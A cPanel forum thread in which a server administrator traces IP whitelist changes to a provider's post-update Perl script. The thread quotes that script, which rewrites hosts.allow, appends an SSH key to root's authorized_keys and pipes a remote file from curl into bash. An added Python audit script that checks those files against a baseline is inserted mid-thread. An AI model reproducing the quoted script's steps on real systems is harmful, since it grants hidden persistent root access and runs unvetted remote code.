
Security Issue with access restriction

Discussion in 'Security' started by carcaras, Jun 17, 2019.

  1. carcaras

    carcaras Registered

    Joined:
    Jun 17, 2019
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Armenia
    cPanel Access Level:
    Root Administrator
    Hello.

    I am having an issue. I have 2 IP addresses that keep getting whitelisted again in Host Access Control. I am checking the root cron jobs, and these are the ones.

    Code:
    SHELL="/bin/bash"
    36 4 * * * /usr/local/cpanel/scripts/exim_tidydb > /dev/null 2>&1
    
    SHELL="/bin/bash"
    0 0 * * 7 truncate -s 0 /home/quikdraw/public_html/vqmod/checked.cache > /dev/nul 2>&1
    
    
    SHELL="/bin/bash"
    40 3 * * * /usr/local/cpanel/scripts/optimize_eximstats > /dev/null 2>&1
    
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    58 22 * * * /usr/local/cpanel/scripts/cpbackup
    
    
    SHELL="/bin/bash"
    1 * * * * /usr/bin/test -x /usr/local/cpanel/bin/tail-check && /usr/local/cpanel/bin/tail-check
    
    
    SHELL="/bin/bash"
    36 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_mailman_cache && /usr/local/cpanel/scripts/update_mailman_cache
    
    
    SHELL="/bin/bash"
    0 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_db_cache && /usr/local/cpanel/scripts/update_db_cache
    
    
    SHELL="/bin/bash"
    
    SHELL="/bin/bash"
    29 */2 * * * /usr/local/cpanel/bin/mysqluserstore >/dev/null 2>&1
    
    SHELL="/bin/bash"
    9 */2 * * * /usr/local/cpanel/bin/dbindex >/dev/null 2>&1
    
    SHELL="/bin/bash"
    57 */6 * * * /usr/local/cpanel/scripts/autorepair recoverymgmt >/dev/null 2>&1
    
    SHELL="/bin/bash"
    */5 * * * * /usr/local/cpanel/scripts/dcpumon-wrapper >/dev/null 2>&1
    
    SHELL="/bin/bash"
    49 4 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
    
    SHELL="/bin/bash"
    23,38,53,8 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1
    
    0 2 * * * /usr/local/cpanel/bin/backup
    
    @reboot /usr/local/cpanel/bin/onboot_handler
    
    0 5 * * * /usr/local/cpanel/3rdparty/bin/freshclam --quiet --no-warnings
    
    #26 23 * * 0 (/usr/local/cpanel/scripts/fix-cpanel-perl; /usr/local/cpanel/scripts/upcp --cron)
    
    26 23 * * * /etc/upcp_control
    
    5,20,35,50 * * * * /usr/local/cpanel/scripts/eximstats_spam_check 2>&1
    
    20 21 * * * /usr/local/cpanel/3rdparty/quickinstall/scripts/getCache.pl
    
    0 */2 * * * /usr/local/cpanel/scripts/shrink_modsec_ip_database -x 2>&1
    
    09,39 * * * * /usr/local/cpanel/scripts/clean_user_php_sessions > /dev/null 2>&1
    
    I don't see anything wrong in there that could change the IP list. Also I changed the server security so ssh can only be accessed using keys.

    These are the IPs entries. - Removed -

    But for WHM the site owner has a dynamic IP, so I don't know how we can fix this security hole.

    Thanks in advance.
     
    #1 carcaras, Jun 17, 2019
    Last edited by a moderator: Jun 17, 2019
  2. keat63

    keat63 Well-Known Member

    Joined:
    Nov 20, 2014
    Messages:
    1,296
    Likes Received:
    91
    Trophy Points:
    28
    cPanel Access Level:
    Root Administrator
    I'm struggling to comprehend what you're asking.
    Could you reiterate, please?
     
  3. carcaras

    carcaras Registered

    Joined:
    Jun 17, 2019
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Armenia
    cPanel Access Level:
    Root Administrator
    Sure, I keep blocking these 2 IP addresses in the "Host Access Control" (Home > Security Center > Host Access Control) and overnight they are allowed again.

    - Removed -

    I just found the script doing it.

    /opt/postupcp/Modules.pm

    And these 2 "functions"

    Code:
    sub fix_ssh_perms {
        open(FILE, "</etc/hosts.allow");
        my $write;
        while(<FILE>) {
            next if ($_ =~ /70.87.80.194|50.23.47.206/);
            $write .= $_;
        }
        close(FILE);
        open(FILE, ">/etc/hosts.allow");
        print FILE "sshd : 70.87.80.194 : allow\n";
        print FILE "sshd : 50.23.47.206 : allow\n".$write;
        close(FILE);
        open(FILE, "</etc/hosts.deny");
        $write = '';
        while(<FILE>) {
            next if ($_ =~ /70.87.80.194|50.23.47.206/);
            $write .= $_;
        }
        close(FILE);
        open(FILE, ">/etc/hosts.deny");
        print FILE $write;
        close(FILE);
        system("chattr -ai /root/.ssh/* ; chmod 550 /root ; chown root. /root ; chmod 700 /root/.ssh ; chown root. /root/.ssh ; chmod 600 /root/.ssh/* ; chown root. /root/.ssh/* $
    }
    
    sub updatekey {
        print "[*] Running key update...";
        my $one = 0;
        my $two = 0;
    
        open(FILE,"/root/.ssh/authorized_keys");
        while(<FILE>) {
            if ( /tFkWcvQCYbHyiOIWGpz9/ ) {
                $one = 1;
            } elsif ( /user\@localhost/ ) {
                $two = 1;
            }
        }
        close(FILE);
    
        if ( $one == "0" ) {
            print "no key ";
            system("chattr -ia /root/.ssh/authorized_keys");
            open(WRITE,">>/root/.ssh/authorized_keys");
            print WRITE 'from="10.20.0.5,192.185.0.100,74.220.198.220,70.87.80.194,50.23.47.206,10.44.39.75,67.18.2.226",no-X11-forwarding,no-port-forwarding ssh-rsa AAAAB3Nz$
            close(WRITE);
            system("curl --connect-timeout 5 http://scripts3.hostgator.com/firefly.txt?nokey > /dev/null");
    
        }
    
        if ( $two == "1" || -e "/.cache/.ntp" ) {
            system("chattr -ia /root/.ssh/authorized_keys");
            system("sed -i '/user\@localhost/d' /root/.ssh/authorized_key*");
            system("curl --connect-timeout 5 http://scripts3.hostgator.com/firefly.txt?resolve | bash");
            print "clean ";
        }
        print "\n";
    }
    
    
    They seem to be from the host company (Hostgator), but I can't be sure. I am asking them, but they are taking forever to reply.

    I am concerned because we are handling some delicate information within our servers.
     
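One way to notice this kind of overnight change before relying on Host Access Control alone, as an added example that is not part of the thread and not cPanel's or the provider's code: a Python audit that parses hosts_access-style rules and an authorized_keys file (including the from="..." source restriction the script above writes) and reports every sshd grant or key that is not in an administrator-maintained baseline. The sample inputs, the addresses (RFC 5737 documentation ranges), the key blobs and the approved lists are all constructed for the example.

```python
"""Audit sshd access rules and root SSH keys against an administrator baseline.

Added example, not code from the thread or from cPanel: it parses
/etc/hosts.allow-style rules and an authorized_keys file (including the
from="..." source restriction used in the thread's script) and reports
entries that are not in the administrator's approved lists.
"""
import re
import sys

# The key-type token separates optional key options from the key itself.
_KEY_RE = re.compile(
    r'^(?:(?P<opts>\S.*?)\s+)?'
    r'(?P<type>ssh-rsa|ssh-ed25519|ssh-dss|ecdsa-sha2-nistp(?:256|384|521))\s+'
    r'(?P<blob>[A-Za-z0-9+/=]+)(?:\s+(?P<comment>.*))?$')
_FROM_RE = re.compile(r'from="([^"]*)"')

# Constructed sample inputs: RFC 5737 documentation addresses and fake key blobs.
SAMPLE_HOSTS_ALLOW = """\
# written by the administrator
sshd : 192.0.2.10 : allow
sshd : 198.51.100.7 : allow
sshd : 198.51.100.8 : deny
"""
SAMPLE_AUTHORIZED_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFAKEADMINKEY00000000000000000000 admin@workstation
from="198.51.100.7,198.51.100.8",no-X11-forwarding,no-port-forwarding ssh-rsa AAAAB3NzaC1yc2EFAKEVENDORKEY0000000000 vendor-support
"""
# Baseline the administrator maintains: the only sshd clients and key blobs expected.
APPROVED_CLIENTS = {'192.0.2.10'}
APPROVED_BLOBS = {'AAAAC3NzaC1lZDI1NTE5AAAAIFAKEADMINKEY00000000000000000000'}


def parse_hosts_access(text):
    """Parse hosts_access(5) syntax 'daemons : clients [: option]'.

    Comments and backslash line continuations are handled; returns a list of
    (daemons, clients, option) tuples.
    """
    entries, pending = [], ''
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].rstrip()
        if line.endswith('\\'):
            pending += line[:-1] + ' '
            continue
        line, pending = (pending + line).strip(), ''
        if not line:
            continue
        parts = [p.strip() for p in line.split(':')]
        if len(parts) < 2:
            continue
        daemons = [d for d in re.split(r'[,\s]+', parts[0]) if d]
        clients = [c for c in re.split(r'[,\s]+', parts[1]) if c]
        entries.append((daemons, clients, ' : '.join(parts[2:])))
    return entries


def parse_authorized_keys(text):
    """Return one dict per key line: type, blob, comment and from= sources ('*' if unrestricted)."""
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        m = _KEY_RE.match(line)
        if not m:
            continue
        fm = _FROM_RE.search(m.group('opts') or '')
        sources = [s for s in fm.group(1).split(',') if s] if fm else ['*']
        keys.append({'type': m.group('type'), 'blob': m.group('blob'),
                     'comment': (m.group('comment') or '').strip(),
                     'sources': sources})
    return keys


def audit(hosts_allow_text, authorized_keys_text, approved_clients, approved_blobs):
    """Return (severity, message) findings; an empty list means both files match the baseline."""
    findings = []
    for daemons, clients, option in parse_hosts_access(hosts_allow_text):
        if not ({'sshd', 'ALL'} & set(daemons)) or option.lower() == 'deny':
            continue  # not an sshd grant
        for client in clients:
            if client not in approved_clients:
                findings.append(('high', f'hosts.allow grants sshd to unapproved client {client}'))
    for key in parse_authorized_keys(authorized_keys_text):
        if key['blob'] not in approved_blobs:
            findings.append(('critical', f'unapproved {key["type"]} key "{key["comment"]}" '
                                         f'restricted to {",".join(key["sources"])}'))
        elif key['sources'] == ['*']:
            findings.append(('low', f'approved key "{key["comment"]}" has no from= restriction'))
    return findings


def main(argv):
    """Usage: audit_ssh_access.py [HOSTS_ALLOW AUTHORIZED_KEYS]; without paths the sample data is used."""
    if len(argv) == 3:
        with open(argv[1]) as fa, open(argv[2]) as fk:
            hosts, keys = fa.read(), fk.read()
    else:
        hosts, keys = SAMPLE_HOSTS_ALLOW, SAMPLE_AUTHORIZED_KEYS
    for severity, message in audit(hosts, keys, APPROVED_CLIENTS, APPROVED_BLOBS):
        print(f'[{severity}] {message}')


if __name__ == '__main__':
    main(sys.argv)
```

Fill APPROVED_CLIENTS and APPROVED_BLOBS with the entries you placed yourself, then run it as root against the real files (`python3 audit_ssh_access.py /etc/hosts.allow /root/.ssh/authorized_keys`) from a cron entry scheduled shortly after the nightly upcp run; a critical finding is a key you did not authorise. Note that the script in the post strips the immutable attribute with `chattr` before writing, so `chattr +i` on those files is not a control here; the audit gives you the evidence, and the remaining step is the conversation with the provider.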
  4. cPanelLauren

    cPanelLauren Forums Analyst II Staff Member

    Joined:
    Nov 14, 2017
    Messages:
    6,476
    Likes Received:
    507
    Trophy Points:
    263
    Location:
    Houston
    cPanel Access Level:
    DataCenter Provider
    That's a postupcp script that runs every time upcp runs (at night). More than likely your provider added it to ensure that they'd be able to access the server in a disaster or support situation. You'll need to discuss with them if you're able to remove the script.
     
  5. carcaras

    carcaras Registered

    Joined:
    Jun 17, 2019
    Messages:
    3
    Likes Received:
    1
    Trophy Points:
    3
    Location:
    Armenia
    cPanel Access Level:
    Root Administrator
    Thank you! That's exactly the case here. I am waiting for a reply from them!
     
    cPanelLauren likes this.